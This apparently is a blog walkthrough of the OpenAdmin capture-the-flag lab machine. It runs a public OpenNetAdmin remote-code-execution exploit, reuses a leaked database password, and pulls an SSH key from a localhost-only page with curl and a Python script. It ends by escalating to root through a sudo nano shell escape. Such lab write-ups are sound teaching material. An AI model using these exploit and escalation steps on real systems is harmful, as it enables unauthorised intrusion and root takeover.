The first box of 2020 was OpenAdmin, an Easy Linux machine whose name already hints at what you will be dealing with. Let’s do this!

[0x1] Reconnaissance & enumeration
The kickoff, as always, is an Nmap scan of the machine on 10.10.10.171. OpenNetAdmin (ONA) is a web-based IP address management tool, so I expect to see port 80 and/or 443 before the results even come in.
The scan indeed shows port 80 open, with port 22 (SSH) alongside it.
nmap -sC -sV -oA ~/Documents/boxes/openadmin 10.10.10.171
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-25 13:40 GMT
Nmap scan report for 10.10.10.171
Host is up (0.020s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
13/tcp filtered daytime
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
1022/tcp filtered exp2
1072/tcp filtered cardax
1085/tcp filtered webobjects
2701/tcp filtered sms-rcinfo
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.89 seconds

The default Apache page reveals little, so I start dirb to brute-force directories on the web server. It finds “/artwork” and “/music”.
dirb http://10.10.10.171
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Jan 25 13:48:48 2020
URL_BASE: http://10.10.10.171/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.171/ ----
==> DIRECTORY: http://10.10.10.171/artwork/
+ http://10.10.10.171/index.html (CODE:200|SIZE:10918)
==> DIRECTORY: http://10.10.10.171/music/
+ http://10.10.10.171/server-status (CODE:403|SIZE:277)
---- Entering directory: http://10.10.10.171/artwork/ ----
==> DIRECTORY: http://10.10.10.171/artwork/css/
==> DIRECTORY: http://10.10.10.171/artwork/fonts/
==> DIRECTORY: http://10.10.10.171/artwork/images/
+ http://10.10.10.171/artwork/index.html (CODE:200|SIZE:14461)
==> DIRECTORY: http://10.10.10.171/artwork/js/
---- Entering directory: http://10.10.10.171/music/ ----
==> DIRECTORY: http://10.10.10.171/music/css/
==> DIRECTORY: http://10.10.10.171/music/img/
+ http://10.10.10.171/music/index.html (CODE:200|SIZE:12554)
==> DIRECTORY: http://10.10.10.171/music/js/
-----------------
END_TIME: Sat Jan 25 13:56:58 2020
DOWNLOADED: 13836 - FOUND: 4
[0x2] Initial Foothold
The Artwork site has nothing of interest, but the Music site has a Login entry in its menu, and that link points to /ona.

The login page confirms that “OpenAdmin” is a nickname for the OpenNetAdmin (ONA) package.

To gain access to the server I look for a known vulnerability in the software. The exploit for OpenNetAdmin 18.1.1 turns up via searchsploit and ships with the exploitdb package on my attacker machine. If you download the script and it refuses to run, convert its line endings with dos2unix first.
searchsploit OpenNetAdmin
------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------- ----------------------------------------
OpenNetAdmin 13.03.01 - Remote Code Execution | exploits/php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Remote Code Execution | exploits/php/webapps/47691.sh
------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Time to run the exploit against the URL of the OpenNetAdmin site.
$ dos2unix 47691.sh
$ ./47691.sh http://10.10.10.171/ona/
Houston, we have a shell! A limited one, since each command is sent as a separate web request and there is no TTY, but that does not matter for now. In the shell I am the user www-data.
$ whoami
www-data
[0x3] Path to User flag
The next phase took a little longer. As www-data I could read a lot of files and folders, and going through them is tedious work. After a while I found a database configuration file that looked interesting.
/opt/ona/www/local/config/database_settings.inc.php
The file holds a full database configuration, but the interesting part is the db_passwd entry. Nothing else turned up, so I gambled on a lazy administrator having reused this password elsewhere.
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
/home is readable, and the listing immediately suggests whom this password might belong to.
$ cd /home
$ ls
jimmy
joanna
Joanna does not accept the password, but Jimmy does! First credentials are in, and SSH access makes life a lot easier again.
ssh jimmy@10.10.10.171
jimmy@10.10.10.171's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
While looking for the folder OpenNetAdmin runs from, I also came across an internal folder under /var/www. It contains three files that are apparently served by a web server as well.
jimmy@openadmin:/var/www$ cd internal
jimmy@openadmin:/var/www/internal$ ls
index.php
logout.php
main.php
main.php reveals that Joanna’s private key is printed when the page is requested. Note how weak the access check is: if no session username is set, the script only sends a Location header and, lacking an exit() after header(), falls straight through to the shell_exec that cats the key.
jimmy@openadmin:/var/www/internal$ cat main.php
<?php session_start();
if (!isset ($_SESSION['username'])) { header("Location: /index.php"); };
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
The site is not served from the default document root and Nmap showed no extra port. The folder is called “internal”, which suggests it is not reachable from my machine but only from the server itself. The Apache config confirms this: the vhost listens on 127.0.0.1:52846 only. It also explains how a PHP page can read /home/joanna/.ssh/id_rsa at all: mpm_itk’s AssignUserID runs this vhost as joanna rather than www-data.
jimmy@openadmin:/etc/apache2/sites-enabled$ cat internal.conf
Listen 127.0.0.1:52846
<VirtualHost 127.0.0.1:52846>
ServerName internal.openadmin.htb
DocumentRoot /var/www/internal
<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
To reach the URL from the machine itself I use curl from my SSH session as jimmy. main.php only checks for a session username; the actual username and password check lives in index.php. Because curl does not follow redirects unless told to with -L, and main.php keeps executing after its header() call, the response body contains the key either way.
curl -d "username=jimmy&password=n1nj4W4rri0r!" -X POST http://127.0.0.1:52846/main.php
And there we have it, Joanna’s private key has arrived.
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D
[...]
-----END RSA PRIVATE KEY-----
The private key is not directly usable for logging in. The Proc-Type: 4,ENCRYPTED header shows it is protected with a passphrase, which SSH will prompt for; the “Don’t forget your ‘ninja’ password” hint on main.php is the nudge towards it. Save the key with permissions 600, otherwise ssh refuses to use it. With the passphrase recovered and the key file in hand, it is possible to log in to the box as joanna.
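As an added example (not from the original post), this Python script does the key handling from jimmy’s shell on the box: it fetches main.php over plain http.client so the 302 is not followed, cuts the PEM block out of the <pre> wrapper, reports whether the key is passphrase-protected, and writes it with mode 0600 so ssh will accept the file. The host, port and output filename are assumptions taken from the page; the sample HTML below is constructed, with placeholder base64 rather than the real key body. No passphrase recovery is done here.

```python
"""Added example: extract and sanity-check a PEM private key returned in HTML."""
import http.client
import os
import re
import stat
from typing import Optional

# Matches an OpenSSL "traditional" PEM private key, including any
# Proc-Type / DEK-Info headers that sit inside the BEGIN/END lines.
PEM_RE = re.compile(
    r"-----BEGIN (?P<label>[A-Z ]+) PRIVATE KEY-----\r?\n"
    r"(?P<body>.*?)"
    r"-----END (?P=label) PRIVATE KEY-----",
    re.DOTALL,
)


def fetch_page(host: str = "127.0.0.1", port: int = 52846, path: str = "/main.php") -> str:
    """GET the page without following redirects (http.client never does),
    so the body that main.php emits after its Location header is kept."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    try:
        conn.request("GET", path)
        return conn.getresponse().read().decode(errors="replace")
    finally:
        conn.close()


def extract_private_key(html: str) -> Optional[str]:
    """Return the first PEM private key found in the HTML, or None."""
    m = PEM_RE.search(html)
    if not m:
        return None
    return m.group(0).replace("\r\n", "\n") + "\n"


def key_is_encrypted(pem: str) -> bool:
    """True if the legacy PEM carries the 'Proc-Type: 4,ENCRYPTED' header.
    (OpenSSH new-format keys signal encryption differently; the page shows
    a legacy PEM, so that case is not handled here.)"""
    return any(line.startswith("Proc-Type: 4,ENCRYPTED") for line in pem.splitlines()[1:3])


def dek_info(pem: str) -> Optional[str]:
    """Return the cipher named in the DEK-Info header, e.g. 'AES-128-CBC'."""
    for line in pem.splitlines()[:4]:
        if line.startswith("DEK-Info:"):
            return line.split(":", 1)[1].strip().split(",")[0]
    return None


def save_key(pem: str, path: str) -> int:
    """Write the key owner-readable only and return the resulting mode bits."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(pem)
    os.chmod(path, 0o600)  # in case the file already existed with wider bits
    return stat.S_IMODE(os.stat(path).st_mode)


# Constructed sample in the shape main.php produces; placeholder key body.
SAMPLE_HTML = (
    "<pre>-----BEGIN RSA PRIVATE KEY-----\n"
    "Proc-Type: 4,ENCRYPTED\n"
    "DEK-Info: AES-128-CBC,00000000000000000000000000000000\n"
    "\n"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n"
    "-----END RSA PRIVATE KEY-----\n</pre>\n"
    "<html>\n<h3>Don't forget your \"ninja\" password</h3>\n</html>\n"
)


if __name__ == "__main__":
    pem = extract_private_key(fetch_page())
    if pem is None:
        raise SystemExit("no private key in response")
    if key_is_encrypted(pem):
        print(f"key is passphrase-protected ({dek_info(pem)}); ssh will prompt for it")
    mode = save_key(pem, "rsa_id_joanna")
    print(f"saved rsa_id_joanna with mode {oct(mode)}")
```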
ssh -i rsa_id_joanna joanna@10.10.10.171
Enter passphrase for key 'rsa_id_joanna':
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
Once connected and in Joanna’s home folder, you can grab the user flag for the first part of this box.
cat user.txt
c9b2cf07d40807e62af62660f0c81b5f
[0x4] Path to Root flag
Before escalating to root, I first check which sudo rights Joanna has on the box. She may run /bin/nano /opt/priv as root without a password.
sudo -l
Matching Defaults entries for joanna on openadmin:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User joanna may run the following commands on openadmin:
(ALL) NOPASSWD: /bin/nano /opt/priv
Besides being a text editor, nano is also a so-called GTFOBin: a Linux binary known to be abusable for privilege escalation when it can be run with elevated rights.

So the privilege escalation for Joanna looks very simple: running the sudo command opens a nano window. According to GTFOBins, from inside the editor you press Ctrl+R followed by Ctrl+X to get a command prompt; entering reset; sh 1>&0 2>&0 then hands you a shell as root.
sudo /bin/nano /opt/priv
^R^X
reset; sh 1>&0 2>&0
In the shell you can now see that a new root shell has been spawned from the Nano editor.
# whoami
root
Last action on this box, grab the root flag!
# cat /root/root.txt
2f907ed450b361b2c2bf4e8795d5b561
Warning: All information in this post is for educational use only! Do not use it against others when you do not have explicit approval to do so. I am not responsible for your actions. Using this knowledge for illegal activities could land you in jail!